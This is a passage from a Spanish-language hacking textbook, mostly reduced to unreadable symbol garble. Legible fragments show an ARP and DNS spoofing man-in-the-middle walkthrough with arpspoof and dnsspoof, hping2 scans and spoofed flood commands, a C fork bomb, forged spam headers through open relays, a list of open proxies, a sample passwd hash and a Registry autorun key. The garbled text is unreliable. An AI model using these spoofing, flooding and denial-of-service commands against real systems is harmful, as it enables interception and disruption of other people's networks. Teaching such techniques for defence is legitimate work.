Client Host: Windows, con PuTTY instalado (Un programa gratuito SSH para Winxx)
IP=192.168.1.77 (Direccin MAC irrelevante)
Atacante MITM: (con dsniff ejecutndose)
MAC=08-00-BA-DD-FE-ED, IP=192.168.1.210
Destino: Direccin MAC irrelevante, IP est por fuera 192.168.1.x
Hostname = "external.host.com"
Gateway (y servidor DNS): Sirve 192.168.1.x LAN
MAC=08-00-DE-AD-BE-EF, IP=192.168.1.1
3 * : & ; $,?$
2! " # &&7! 5
5D 2>
[Cliente] C:\WINDOWS>arp -a
Interface: 192.168.1.77 on Interface 0x2000003
Internet Address Physical Address Type
192.168.1.1 08-00-de-ad-be-ef dynamic
115
"& $,?$ ! 3 F2
$,?$ # 2 !
>
[Host MITM] % arpspoof t 192.168.1.77 192.168.1.1
5 5D >
[Cliente] C:\WINDOWS>arp -a
Interface: 192.168.1.77 on Interface 0x2000003
Internet Address Physical Address Type
192.168.1.1 08-00-ba-dd-fe-ed dynamic
$54 $,?$ 2
$,?$! " !
0 3+.
0
3+.! D , $,?$
, ! '
K!!K , 9A=!9QB!9!!
# 66
0
&>
[Host MITM] % dnsspoof
D >
[Cliente] C:\WINDOWS>ping external.host.com
Pinging external.host.com [192.168.1.210] with 32 bytes of data:
7 !! , $,?$!
"
, :9A=!9QB!9!=9R; $,?$! .
..1 2 1??. #
+ G & :
..1 ..1= &
0;!
2 # 0
! ' >
V# $,?$ $,?$ !
" $,?$
! 3

$,?$
!
!!
?? ! " #
0 ! % &
>
116
WARNING POTENTIAL SECURITY BREACH!

The servers host key does not match the one PuTTY has stored in the registry
" > ! ! ? :.#;
+ 0 : 0 ;
"
!
= !
5 ?? & ! /
.4D? : ;
: ;! ..1 '+,-
IJ
! "
F !
" 1??. ! 2
!
.&) " # &! 4
! + > +&8M
IJ no :;! .
! BR BRBR
E9=B 0 !
5 ) > ,
&
! !

2 ,FFFF
5!
4 &
! 1
2 '!
7

4
# !
* ! 3

* !
% / ? 7? : &
; !
25HTTPS Secure HyperText Transfer Protocol (Protocolo Seguro de Transferencia de Hipertexto) Protocolo de seguridad diseado por
Netscape e incorporado a su propio navegador con el fin de garantizar la seguridad de las comunicaciones entre el usuario y el servidor web
al que ste se conecta. Para ello utiliza el protocolo SSL, desarrollado tambin por Netscape.
117
3 .
5 $ # (
#

# #! .
# 0
! 5 0 * !
% * *
& !
9!F % +,4 ! " & &
! " 7 75 :;
!
=!F 4 0 ! " ) #
& . ! " %
& >
^_

^_ F2
E!F % # :;! .
!
" ! .
77 #
%R4( & ! 5

!
% >
9!F 4 2! "
! 3 * !
=!F ? # ..1 , .
!
, 9-
" 4 & 4 0
& !
/ 4 & 4 !
" %! ? ! ! 7?
0 !
118
, 0777;

" ! 1
& +,4 & R!R!R!R!
" ! 5 0
& & 0 &
! % &
# !
%

! "

!
3
!
" *

!
" ! .

! .
%5+! .
0
&
5DF. !
119
' ?
? *
# =E! . ,
# '+,-! " ?
# ! 1
#
? # 7? C=Q !
! '
? ! %
! .
0 &
! . ? #
&
!
? )2 % #
F! %
# 2 ! ?
2 !
' ! "
3" *
!
" :
; , : ;!
? :? ";
,!
!
5 ? 0
#! 5
? ) 4D? ? ?8 $
? 348

?4V,!
D
? >
+6? :+2( 6 ?; 0
# !
" )2 >
BR
. =E! .
!
26Gopher (Gopher) Antiguo servicio de informacin distribuida, anterior a la aparicin del WWW. Desarrollado por la Universidad de
Minnesota, ofreca colecciones jerarquizadas de informacin en Internet.
120
3 ? )2 %! +
# I J
)!
" * ..1 ? )
! . ! .
?
!
!
?
:; 0! 3
> : 6?
F6 ?F 3"4 ; K8OR :
,
$;!
& =S
GGHH! 3 7? #
! 3
& *
* !
' / IJ I/J :
; ! '

: $.3/.=B % ; ! 3
! ?
!
%
IJ! 4
#
# & 2 :
*;! .
!
" ? > ? GG? 3HH
! 5
! . :
;
:; *!
' :6?9RR 5+., ;! % 6?9RR

! 1 # !
? 2
&
!
27 Es la parte de la consola de comandos del DOS de una computadora que nos pide un comando. Es el smbolo C:\>.
28(Sistema Operativo de Disco) DOS fue el primer sistema operativo para computadoras personales. Se basa en comandos que se escriben
lnea por lnea dese un prompt. MSDOS significa Microsoft DOS. No confundir con DoS (Denial of Service), con "o" minscula.
121
% 'D%
>>VV

E=SR>VV
! .
0 IJ

: B5X; 0 !
3
, ,
!
% ,&
)2! 4 'D%F?! " #
,
. #

& ! 1 )2 =RRR!
0
" 99R :; ! 4 ?
& 0 !
& >
!!! 99R
> c
> c2
. 0 ! &
! . &
0 @ 0cc&! " @
0cc& & ! $
# !
5 =O :;
#
& *
& ! C
!
!!! =O
. & >
> c Gc]c!H

> c]c!
" * ! " &
& IcJ &!
$ Ic]c!J!
122
" :];
! . 0
!
& >
> & G&]!H
% &!
! . #
:&;! 5 & # &!
& GH!
B
" ! Z
, ! ?
I7J & !
3
# !

!
1 c
.
helo (nuestro_nombre_en_red) [(nuestra_IP)] please to meet you
!
. , ! "
& !
5 +
# !
" ,
0 !
" # !
(
1 0
0) Z &
!
GH
! "
GH GH
123
" 7 ! .
* :
* ;!
. ! &
5 % "* T
T $#! ! . #
T $!
" 0 *
! D *! ?
*
! ? ,# . : LE;
!

. 0 & ?
!
!
124

" &
#! "
>
! " 0
!
" + : AE; =
9RRe ! .
!
!
% > & : ; ,75
& : ; 0+ : ;! "

# ! 4
# ,3. IJ !
" /
& #
,3. # ! .
,3. ! .

!
!
. 9RRe
&
! .
#
!
% 7 ?4 4
+5G) 2E+ +*8Q4 " 9
! .
> .+ .+V54 54!
=A Llamada en espaol Acuerdo de Tres Vas.
125
, :; # 0T

:;! " 0T2 ?
! 3 # ?
?F2 ?4V, (
!
" # !
5# B02 ?! "
! Z
,3. #! '
# !
,7&0 <+
Z 1
?F2 ?4V, 1(
,3. !
0T0
Z 7 ?4 0 #
54
# D.?! "
D.?! " !
126
. .+ # .+V54
! . # D.?V54 !
Z ,3. . ?4) ,%! "
3. : U 3
F ; .+ 7
# ! $
,3.
& & !
0+0
Z # #
,3.! 1 # >
2( !
0T2 ?0
Z # ?F2 ?4V, 1(! .
# .+V54
! " 0
.+ !
" #
! 1
! % 0
& !
!E0
3
.3
?4V,! " # #
7,+ D.?
I
J :D74 SAE QL;! 6 L!
127
" $
&! 3 &
-$5. + & )AOV+?!
#
)2! .
)2 0 .+ #
)2! "
D.?
: ;! 5 4 .
.3, $6. ,D,Z !
4 D.? ! 4
#

.+ .+V54!
?0
Z + 5
! 4
.+
!
" 54 ,3 !
4 D.? I
J
# E < D +
I
J! ' # +
# I J ! .
IJ!
/ # 54 ER : 2
2; # , ! $ # 54 #
! "
:? ? %;
),+3/) ! " D.?
!
" ,
??%
??% !
" & & >
( 9> ---!---!---!--- =R>7>D.? FH > SR 2>R fH
( => ---!---!---!--- =9>7>D.? FH > SR 2>R fH
( E> ---!---!---!--- ==>7>D.? FH > LR 2>R fH
( L> ---!---!---!--- =E>7>D.? FH > SR 2>R fH
6 == ??%
!
30En software, un bug es un error en la codificacin o en la lgica, que provoca el funcionamiento deficiente del programa o resultados
incorrectos.
128
" ),+3/) ! 4
R * ! Z

.3 :7
.3 /
.3; '+,- :5,- 3C'-;
!
' & # >
( 9> ---!---!---!--- =R>7>D.? FH > QL 2>R fH
( => ---!---!---!--- =9>7>D.? FH > QL 2>R fH
( E> ---!---!---!--- ==>7>D.? FH > QL 2>O9= fH
( L> ---!---!---!--- =E>7>D.? FH > QL 2>R fH
Z

!
D0
" & :54 7,+ D.? 'DC .+ .1;!
4
D.? ! .
! "
O!
% D74
*
)2 6! '+,-!
129
F<00
Z ! "
?4 :54 7,+ D.? 'DC .+ .1;! 5
?4V,

.3 '+,-!
" #
( D.?
! ? +'%%
!
E0
Z
*! "
! 1 >
! "
IJ : ,
;
#
!
% ! " ,3%"
!
?4V,>
0 ,,3 !
% ?4V, >
9!
=!
E!
L!
O!
' 0T2 ? .+ !

' B0 .+ !
' D.? 0T2 ?!
' D.?!
0
,3, ,!
Q!
130
"
EE! ,&8
!
= F 9RRR F BR F F. F5
HPING zombie (eth0 zombie): S set, 40 headers + 0 data bytes
60 bytes from zombie: flags=RA seq=0 ttl=64 id=41660 win=0 time=1.2ms
60 bytes from zombie: flags=RA seq=1 ttl=64 id=+1 win=0 time=75ms
4 5
! $
! Z !
" .+
.+ , ! ?>
= F F9RRR F == F. F 222!!!
" .+ ! .
# 0T2 ?! "
0T2 ? .+ # B0! 3
0 ! .
# D.? ! 5 D.?
!
131
" E 0 ! 4

#
Q
9 = > # .+V54
: ; .+
! 3 :
#
#;!
' #

0 !
!
3 0 >
3
= F F9R F BR F F. F5
8
= F F9R F == F. F5 222!!!
4 5 # ! "
9R ! 4
== 222!!! 0
.+V54 0 D.?
!
132

" &
# ,4$
& &
! ) 5

#
! " # & 0 =
!
5 +&8
?4V, ! 1=
,4$ ?4 '3 ,4$ D5)F,!
#
#!
?
! " #
, ?4 '3 #! 5
>

"
" ! 7!
? & #
5# ?4V,
5 = #
!
! 4
?4 & !
1= ' '! 1
)-- % 2 >

!
' ( (
!
=
^_ =
^_= U
/ 1= #

#! 5 & ,&K &!
D/ ,&8&7 &-
% ?4 #! 5
?4 , & ?4! 5
= >
133
Opcin
-F
-S
-R
-P
-A
-U
-X
-Y
Nombre
fin
syn
rst
push
ack
urg
xmas
ymas
Accin
Establece el flag FIN
Establece el flag SYN
Establece el flag RST
Establece el flag PUSH
Establece el flag ACK
Establece el flag URG
Establece el flag X unused (0x40)
Establece el flag Y unused (0x80)
5
R! "
#
0 #! 5 & &
! 5# #!
-50=0T>
" U. .+! % 9A=!9QB!R!9RO
& 9A=!9QB!R!9RR!
,&8
~$ hping2 -S 192.168.0.100
HPING 192.168.0.100 (eth0 192.168.0.100): S set, 40 headers + 0 data bytes
len=46 ip=192.168.0.100 ttl=128 id=18414 sport=0 flags=RA seq=0 win=0 rtt=149.9 ms
--- 192.168.0.100 hping statistic --5 packets tramitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 0.4/30.6/149.9 ms
B & &
~$ tcpdump tcp -X -s 1514
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 1514 bytes
14:19:22.506194 IP 192.168.0.105.2690 > 192.168.0.100.0: S 729051484:729051484(0) win 512
0x0000: 4500 0028 f5e2 0000 4006 02d0 c0a8 0069 E..( ....@......i
0x0010: c0a8 0064 0a82 0000 2b74 715c 00ee aed9 ...d....+tq\....
0x0020: 5002 0200 d4aa 0000
P.......
14:19:23.649879 IP 192.168.0.105.2691 > 192.168.0.100.0: S 1045497134:1045497134(0) win 512
0x0000: 4500 0028 09bb 0000 4006 eef7 c0a8 0069 E..( ....@......i
0x0010: c0a8 0064 0a83 0000 3e51 052e 34a4 7513 ...d....>Q..4.u.
0x0020: 5002 0200 340b 0000
P...4...
14:19:24.649886 IP 192.168.0.105.2692 > 192.168.0.100.0: S 734408221:734408221(0) win 512
0x0000: 4500 0028 79cb 0000 4006 7ee7 c0a8 0069 E..(y...@.~....i
0x0010: c0a8 0064 0a84 0000 2bc6 2e1d 1432 0224 ...d....+....2.$
0x0020: 5002 0200 b107 0000
P.......
134
4 & = =QAR &
9 ! " & & R
! % . .+! 5
& O 54 9A=!9QB!R!9RR!
" .+ F2 ?4V, (! "
.+V54 54
!
" .+ :.; !
4 *

F2 ?4V, (! " #
,3. . .!
-5B=B0>
" UD D :D.?;! 4
! % &!
" 0 5B F.!
" D.? & ! "
D.? ! .
D.? >
8 &#"3!

! 5 ,3. D.?
! " !
,&8
~$ hping2 -R 192.168.0.100
HPING 192.168.0.100 (eth0 192.168.0.100): R set, 40 headers + 0 data bytes
B & &
13:52:02.992694 IP 192.168.0.105.2894 > 192.168.0.100.0: R 843167096:843167096(0) win 512
0x0000: 4500 0028 8689 0000 4006 7229 c0a8 0069 E..(....@.r)...i
0x0010: c0a8 0064 0b4e 0000 3241 b578 14bc b5a8 ...d.N..2A.x....
0x0020: 5004 0200 6e56 0000
P...nV..
13:52:05.010133 IP 192.168.0.105.2895 > 192.168.0.100.0: R 1069416179:1069416179(0) win 512
0x0000: 4500 0028 f915 0000 4006 ff9c c0a8 0069 E..( ....@......i
0x0010: c0a8 0064 0b51 0000 3dea 4f66 641a 6926 ...d.Q..=.Ofd.i&
0x0020: 5004 0200 c5e0 0000
P.......
6 packets captured
6 packets received by filter
0 packets dropped by kernel
135
-5!=!E>
" 7,+
7,+! 4 7,+
D.?! . # # ! %
# >
~$ hping2 -F 192.168.0.100 -p 135
$
! . ) - .=
! % 5& =
0 !
-E <
$ ,4$
! 1=
, ,4$ '3 ?4! " # #
,4$! 1= ?4
,4$ !
>
~$ hping2 -1 192.168.0.100
HPING 192.168.0.100 (eth0 192.168.0.100): icmp mode set, 28 headers + 0 data bytes
len=46 ip=192.168.0.100 ttl=128 id=27118 icmp_seq=0 rtt=14.9 ms
" 53 9 = # ,4$!
-D
, & '3
58 # & '3! % '3
= 0 +"?
,/. +7. 3+. +,.!
~$ hping2 -2 192.168.0.100
HPING 192.168.0.100 (eth0 192.168.0.100): udp mode set, 28 headers + 0 data bytes
ICMP Port Unreachable from ip=192.168.0.100 name=UNKNOWN
136
500T)& 7

5 =! 6 .+
9EO! " 2! 6 .+ :F.;
, 9A=!9QB!R!9RR!
5 0 !
,&8
~$ hping2 -S 192.168.0.100 -p 135
HPING 192.168.0.100 (eth0 192.168.0.100): S set, 40 headers + 0 data bytes
len=46 ip=192.168.0.100 ttl=128 DF id=28733 sport=135 flags=SA seq=0 win=16616 rtt=122.8 ms
B & &
16:09:12.059187 IP 192.168.0.105.1839 > 192.168.0.100.135: S 15960697:15960697(0) win 512
0x0000: 4500 0028 596b 0000 4006 9f47 c0a8 0069 E..( Yk..@..G...i
0x0010: c0a8 0064 072f 0087 00f3 8a79 3a64 1ef1 ...d./.....y:d..
0x0020: 5002 0200 3f4d 0000
P...?M..
16:09:12.061047 IP 192.168.0.100.135 > 192.168.0.105.1839: S 1298117721:1298117721(0) ack 15960698 win
16616 <mss 1460>
0x0000: 4500 002c 703d 4000 8006 0871 c0a8 0064 E..,p=@....q...d
0x0010: c0a8 0069 0087 072f 4d5f b459 00f3 8a7a ...i.../M_.Y...z
0x0020: 6012 40e8 4034 0000 0204 05b4 0000 `.@.@4........
16:09:12.069235 IP 192.168.0.105.1839 > 192.168.0.100.135: R 15960698:15960698(0) win 0
0x0000: 4500 0028 0000 4000 4006 b8b2 c0a8 0069 E..(..@.@......i
0x0010: c0a8 0064 072f 0087 00f3 8a7a 0000 0000 ...d./.....z....
0x0020: 5004 0000 9a9f 0000
P.......
' 0 : &;! %
B! D ?F2 ?4V, (! "
9A=!9QB!R!9RR .+F54 D.?
!
137

E '
% :3.;
! " #
&
2 !
' 3. &
>

! " 3.
& !
" # 3.! &
7? )
&
!
& 0

% 3.
>
!
B
5
4' !
' 0 3.
! ' .+ 7%//3 :
> ;!
0T! "

!
4
# F2 ?4V, ( : ;!
!
138
" # & .+F54
54 # ! " .+F7%//3 #
! "

54 ! " *
0 !
4
! "

!
" , .! "
# .+ , ! 3
.+F54 , &! 5#

! 4 ,
!
C
! "
!
"
! .
!
' -
.+F7%//3 = #
# .+
.+V54 54 , . !
.+ ,
BR &! 4 5* =
F : BR;>
= F. F F F BR F( FF&
.

01:25:04.745182 ip-falsa.2315 > ip-maquina-objetivo.www:
S 1531287039:1531287039(0) win 512
" .+ :.; F , !
5 0
&>
= F 9RRRRR F. F F F BR F( FF&
4 3RRRRR 9R :
;! .
5!
139
DB0 * 4
'3
3. ! "
, .
!
, '3
: F 9A; :
F S; ! 5

!
! &
=!
= F= F ,9F F S F 9A F( ,=
3 ,= ! ,9F ! %
#
3.!
/
!
= F= F ,9F F S F S F( ,=
E < , !
& &! 1
! "
0
! " 33. :3 3 /
.; !
" 07 ! %
,4$ : ;
,
,4$! D
! .
#
!
" 0 0 , =OO ,
! .
# !
5
,4$ ,
! . 0
& ! $ = #
>
= F9 F 9 F ,F F QRRRR F" ,F
4 5 * ! 4 5 *
!
140
3 & & = 0
0
!
D! " ,4$ 7%//3
'3! . # '3 ,
! 3
& I#"3! >
? ! '
3. !! 4 = >
= F= F 9 F ,F F QRRRR F" ,F

1 & 5 5 0 !
B 4 5
! & 0
! '
#
! 3 &
# 4' 0 ! "
& >
#include <stdio.h>
void main()
while (1)
fork();
4 &
! " ! 1
# ! " &
!
/

& 7?
!
5 0
# ! "
#!
0= 70
>
3
! ' #
! "
# & !
. & # *
# 8
! % ( !
141
. & ?9 :9!OB
; 33.
#
#! " !
5 LRR 3.% 4
& @'

!
'!
) : #
; &
! .
!
1 ,,. :$P ,,. ) .; # &
) 2 & ! .
>
C"? VV!!e=OO!!e=OO2VE=V!NV@@>k
. ,,. "#$%$
&''
( &
4> "#$%$
)''

!
, 0
, ,,. ! 4
>
! F AAAAAAA F QOORR F2 R G,c3H
142
" # AAAAAAA ,4$ " QL( *
! .
,,.
!
3
#
0 !
+ , ! 1
& : & 0 ;
, !
Z 0 ,,.
! % >

& !
% & 33.! .
S 0
! % * !
. #
! 4 # &
#
!
,4$ 7 '3 7 ! "
#!
/ # ! $
2 & ! 1
4 :
(; !
,4 ? #
! G* RR
0 + +! Z 0 #
*! ? & V! "

! 5 .
& ! $
33. ,4$ 7 .+ 7! '3 7
IJ!
B0= B7 70
>
" 3.! " &
3D3. , . : ;
! %
! " +5G) 2E
+ +* !
143
4 .+
.+V54! .
54 !
.+
.+V54!
,
,.
,
! " &3OQ

C :
C2
;! 4 F2 ?4V,
( .+ ,
#! 5
& : * #
; # ! /
&
& F !
'
#
0 !
" :
; & ..1 :==; :=E; 3+. :OE; 2 :BR; !
2 C 1 &
!
5 # V
54 ! " #
.+V54! "
.+
! " 0 V
0
!
144
" 0
222!!VVVV3D3.!! ! "
&
! " V #
5!
!4!3 !
&> , 9R!99!9=!9E 9SA :
C;! % #
9R 99 9= 9E 9SA!
0 ! 4
! "
!
=
!
= F. F 9RRRRR F F
" .+ F
F!
0 * 2EG
4 ( ?4V, 2 )-
33.! "
( ! . # , .
#
33. ! " # )=RRR %
.3!
? #

!
2
>VV!
4
! 1 &
!
1E &
222!!!
145

' ,
! ' ,
! 4

!
4
! .
,! % 2
2 0
!
" 2
! "
2 ! " ,
2 #
!
"
0 ! "
#
! " & ,
!
/ # ! 5
2 ! " 2

! 1
# !
' &

! ?
& ! 5/%
,! $ #
! " 5/% !
2 5/% 4?D%@7O
!

"
, ! % 0
> / D
0
( : 9RBR ); #
IJ &
! '
# ! "
, & !
. FFH FFH !#! 9!=!E!L!O!Q!S!B!A!9R!99!9=
146
% 0 # #>

Received: from Open.proxy.com (5.6.7.8)
By: mail.victima.com with SMTP for <spamee@vctima.com>; 22 feb 2009 12:41:45 -0000
From: <spammer@spam.com>
To: <spamee@vctima.com>
Subject: Es hora de que se te pare la verg...onzoza actitud!
% 0
O!Q!S!B
9!=!E!L!
3 0
& & ! . &
O!Q!S!B # >
Received: from Open.proxy.com (5.6.7.8)
By: mail.victima.com with SMTP for <spamee@vctima.com>; 22 feb 2009 12:41:45 -0000
Received: from spammer.com (1.2.3.4) by open.proxy.com with SMTP for <spamee@vctima.com>; 22 feb 2009
12:40:18 -0000
From: <spammer@spam.com >
To: <spamee@vctima.com>
Subject: Es hora de que se te pare la verg...onzoza actitud!
!
@9- &))
222!!V2!
! %

& 0

I J !
" IJ ,
! 5
, &
:,.;!
" 222!(!VV!
!
&
!
')'
" 222!! ! %
# & >
193.170.41.235
80
640 ms
No
01/20 17:43
4 , :BR;! IQLRJ :
& ;! I+J ,! "
!
147

222!F!V9!!
" ) ,
, ! .
!

5 ,

! " &
:;
!
% & ! "
# ! 4
!
% 2
, &
!
. ,
222!!VVFVFF(
*
!
D
&
. & ! &
4/ :4: 4";
# #>
>VV
>V>VV4>V>VV222!!!
4 # >VV222! !
> 5 : ;
4
'D% !
/ & #>
>VV!2!8BRBRV>VV!2!>BRBRV>VV222!!
148

!
" .(
./4.
,! .
,! /
# !
./4. & ?4 '3! 0
,D4 ./4.
, ! "
,D4
# ,
! 3
2 ./4.! + 0 ,D4!
.(4 >

222!(!!V2V.(432V!
" '3V?4 )
./4.! " , :9RBR
; ./4. !L ./4. !O!
4 0 !
/ D ./4.!
.
>VV!!VV
./4. ! " #
>
2 stat 12-232-116-187.client.attbi.com 1080 7155 103-01-22
3 stat 12-233-223-176.client.attbi.com 1080 5181 103-02-12
4 stat 123-69-33.65.cfl.rr.com 1080 3513 103-02-20
5 stat 13-e4bed1.client.atlantech.net 1080 8633 103-02-13
6 stat 131-109-110-50 1080 1768 103-02-12
5# # 9RBR! 5
#

!
. #
& ! , .(4
./4. ! 3 # &
/ D , ./4.
! % ./4.

!
149
0

"
! .
/ D !
"
& ! . >
>VV!!!V^VV!
" ,
# / D!
" & ! D
0
.$? : ; &>
Failure
Unfortunately the program failed because...
The host machine does not relay
" &
/ D!
. & . &
% 3 4 5 :54% F5 4 %;
!
5# ! 54%>
acl localnet src 192.168.1.0/255.255.255.0
acl localhost src
127.0.0.1/255.255.255.255
acl Safe_ports por 80 443 210 119 70 21 1025-65535
acl CONNECT method CONNECT
acl all src 0.0.0.0/0.0.0.0
http_access allow localnet
http_access allow localhost
http_access deny !Safe_ports
http_access deny CONNECT
http_access deny all
4 # : ;
9A=!9QB!9!RV=OO!=OO!=OO!R
:c 2 FF; ! "
!
150
"
' : ; 2

: 4

;!

%
2 : ;! $

!

/ &

!

7 '
" ! " 0
2 !
'
! ' #
&
!

?
# ! %

# !

/ 0 &
& :3.;!
$ *
: ;! .
&
!
+ 0 & 2 #!
5
2! " (
( ! "
K # K8
.(

' $
!
151
# $
' F!
! .
4 :?& ;! %
&
?4V, :%5+ ,; 4!

# &
! 5
& & # 3%% &
! %
!

' >
! "

! 5 &
)2
:)!;!

@ *7 4 ' :
/;
,D4! " # 9AAB
( ? 4 / ? 3 42 :3; 9ABL
%( ? ( 3"74/+ Q : ;
>VV222!!V! 7 & 4@@!
4 >
!
!
! GF

/!
! GF
! GF
!GF '#
/
$! GF3 7
7 !GF 4 ! . !
" ! &
/ # &
#! . #
&! 5# & # ! '
# #
,D4 :, D 4; # #
344 :3 4FF4;!
%
! ! (! ! % #
# # # # & :
)[ )D
&; # (
2 2 ! 3
#
!
152
' # ( #
# & #
E9EES ( "%""? K=.#2=K! % (
0! 4
*! 5 & # 3%%
0 *!
% # #
&
/! , #
# ,D4 ,P !
' # K K

,
:,.; &! . #
!
> >VV222!!VVO!
4 .
/ & # 9=ELO! %
# & 43
)2
& # !
0O=00
>! / ! . &
! 5 & # )2
&! .! D9Q! .?,Y!
)2!! " .S!
.S 3%% )! . ) :
;! ) D
D & ! "
)! .!
' .S )2!
& & :!; )!
3 ( !
? S #

& !
. ?4V,
?4V,
! %
!
%
*! ? & 2
=! 4 5- ,
" !

! 4 K?
4K >VV222!!V?4V?4
153
4 ?4
~$ netstat -an
Active Internet connections (servers and established)

Proto Recv-Q
Send-Q
Local Address
tcp
0
0
0.0.0.0:2049
tcp
0
0
0.0.0.0:139
tcp
0
0
0.0.0.0:111
tcp
0
0
127.0.0.1:7878
tcp
0
0
212.40.120.80:25
Foreign Address
0.0.0.0:*
0.0.0.0:*
0.0.0.0:*
200.42.143.33:80
0.0.0.0:*
State
LISTEN
LISTEN
LISTEN
LISTEN
LISTEN
" ?4 '3
, ! % % 5
, =9=!LR!9=R!BR , 9=S!R!R!9 :
;! " 7 5 ,
! "
, =RR!L=!9LE!EE 222!! BR 1??
2!
" ! 5#
SBSB K%K # (
! 3
2
!
3 ? 9=ELO!
! '
)2 *! ' #>
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
" +
# !! 3
# !

'
" 0 & :;
! 5
! ?
( : ; 5Y :;! . &
*
! /( /(
I &J
! 0 1 F / *
!
" ,D4 # 344 !

0 #!
" 0
& 0
!
154
%
DE '
' * & ! . *

! . * >
& * 2
*
! " + :';
4* :2; !
. :'; *
0 *! ? &
0 ! "
& 0 + * # ! 3
* !
4 # * ! 5
* (! 1
*>
9! + *
! 5 !
=! + *
& &! . ( *
# !
E! 5 * K"K : ;
L! " 0
0 0 # :b _e h;
2 4(
!
. * 0
(
!
" * ! .
#
!
% # *
*
! % & # *
# & 4' ! 5
0 *
* ! 5# 0
* # !

* >
2 ! 1 *
#! % * ( *
! $ ( *
* !
155
4 (
! "
( !
'
4 0
*! "
: ; *
! % *
2! 3
*
! .
!
" *
*
* !
? & > *
5/%9=E! 5
R9=99=5C? ! 5 *
5/%9=E
5/%9=E R9=99=5C?!
4 *
&> \ \ \ \ \ \ \ \
* ! % &
! " # '
p
* !
S
:.2 2; + * %
2 2&G ! "
! . *
# &
* :4(; ! % *
*
# ( *!
% * * 0
*
*! % * *
0 2!
- +
S D2
. ' ! "
* '! " * I2J
# >
>/[-QL
,>=>E>C>VV>VV
% # >
156
NombreUsuario: gerryson
Contrasea Encriptada: qOZsX6df4BI
NmeroUsuario: 2
NmeroGrupo: 3
NombreReal: Gerryson
DirectorioHome: /home/gerry
Tipo de Shell: /bin/bash
4
* ! % # & 2 #
# * :2!; 5
# &>
>\>=>E>C>VV>VV
% # * :.2!; "
* PIP :" P\P
( # ;! ? # *
* *
!
" P\P * *
P_P PbP 0 +'!
3 *
:2; *! *
& # 4 ,!
5 * T(
? D 4( T( *! 4( T( (
* ' 3/.
! 3 *
( !
? ) : !; $
2 *! "
2 4( !
. ( >
>VV!!(
>VV222!!
>VV222!(!
157
&
!
" 0 *
! *
# ! " # #
! .
0 ( *
4( * & 2 (!
% * : A ;
*
# ! " 2 ( &
, ! . *
[ D! " 2 2 (
* $. / #
!
% # 2 (
*! Z > ! %
* !
% > % 7 3! %
*
*! Z #
*! "
* # 0 !
% 2 ( 7
0 :# 0 0
0!; " 2 (
*! "
! 6 &!
* 4(
*

! . 2 ( *
!
-.
$ , #
* :
2;! 5 ! .
2
& !
" 2
! "

! . 2
!
158
; *

. " : ;! % 2 (
*
2! + 2
*! " ( 2!
D
!
! " 2 # ! "
*
:>;!
@ . # ! "
* ER ER
! 4 !
!*B&) "
! " !
. <& " 2
!
.* " 'V2
( !
%
J )! 5
!

? 2 & I$ .(J
I"J! 4 ! $
! .
! , !
3 2 ! "
& ! 3
! "
!
. 2
4$ 0 2 ! ?
& ( (
2 ! " 4$

& ! Z 53! 2
53 0 I3J I)J
I4 'J I% 4 7J! " 53
2 (!
& " 2
,! 3
# BRBR E9=B BR! . 0
C I5 J
! 2 C)! " 0
4$ 2! C)
!
& ' 1
! , #
!
159
! 53 *
( * IJ I 5 J!
, ! 5
* IJ I5F
J! 4 !
I.V5 ?J ! "
!
,
53! I4
J!
! 5 & E I+/J
!
3 ! 1 (
I. J I5
J! ( I$ J !
B Z 53
! Z
(! .
#
2 !
& )
)0*&&
!
+)
!
+)!*B& . ! "
( !
+)B . ! "
7( D!
+ ) 0& 7 ,< ?)G => Z
( 1?$% : ;
B)+D70*&& /
* ! 3
& ! .
2 #
!
% 5V. & !
0 ),<
" 2 ! 4

2! % 1 :; 1?$%! 5
! %

: F;
*! 1?$%
* ! 3 #
1?$%
!
160
(
LR3E9! % 1?$%
* ( 2
: 1?$%;!
(2
2 ! "
! &
I4* J I, 2J! 5
53
! .
!
I.J I1?$% .J
# I I :GH;
! % I7 2 2 2( J
! "
#
!
? ( I5 /.? J 53
!
1 (
*
! 1 I% J! . # ILR9
F5 J * ! '
0 I
>9QRRJ :
;! " #
! .
! .
! 1 ! 5
!

',
" * 1??! "
* 0 ! 3

&!
" & *
NL ! "
! "
* !
& 7 <E<
% $,$" :$ , $ "> " $
4 ,;
&! " QL!
31 401 es un cdigo de estado que indica a un usuario que no est autorizado a acceder a una pgina. 401 y otros cdigos de estado
forman parte del protocolo HTTP de WWW, escrito en 1992 por el inventor del Web, Tim Berners-Lee, que tom muchos de dichos cdigos
de los correspondientes al FTP (File Transfer Protocol).
161
% $,$" & ,
& &

,! % $,$" D74
D749O=9 9BLB!
QL ! "
0 ! 5#
I5 >
J!
. & >
5 >

4(2&'(73B"(AD=L&(OB177?ff
5 IfJ % 4*
!
D * 5
1?? ! ?
! "
& 5 1??
* KLR3K
#!
& / * 1??
! " #
! .# >
C"? V 1??V9!9
5 >
)?NE -GPE&LJ+88)K-G8QJ,P+OYY
" I
J *!

QL! 7 ! '
$,$">>
QL!
" # >

$,$">>
QL8
& ZNL=[)?NE -GPE&LJ+88)K-G8QJ,P+OYY[>\
" $,$">>
QL 222!!! 3
>
K)4) S-;K
% # + 0 *
!
162

" * (
! 4

& # !
" >
F+ !
F? : ;!
#
&!
! 5
0!
< 6
4
+! + ,3.! .
222!!! " 3.
!
" +
! "
%? 37 ! '

! % & C
! ' &
+ !
B4% # D ? +2( . . +
+ D 2
!
< <

#
! " #

>
# !
!
" : #
; !
. 2 #!
5 5 2

2 0
& 5. 1 "D% ! "
!
163
4
# ! "
4C, #!
4C, 4 C2 , :, 40 " , 40 ;
# 2! " ,
))) #
! % 4C,
2 ! " 4C,
*
4C,F!
% #
/.? C"?! "
1 # >
GN IG9H)GV9HJ8 NH
! " >
9!F < I)E=J : G9H GV9H;!
=!F < !
" & 8
! 5
& & >
GN :I VV2J;8 NH
" &G ! 3
! / #
0 >
GN :I2 >VVVJ;8 NH
& ! "
# & ! "
& 0
& 8
2>
~$ curl -l http://www.inkatel.com
Date: Wed, 2 Jan 2009 15:31:22 GMT
Server: Apache/1.3.27 (Unix) mod_perl/1.27 PHP/4.3.0 mod_ssl/2.8.14 OpenSSL/0.9.7b
Content-Type: text/html; charset=iso-8859-1
! "
1?? 1??. 7? ?"%+"? ! "
, : 0; 2
,,. 5 +F"
5 # 1 /..% c c !
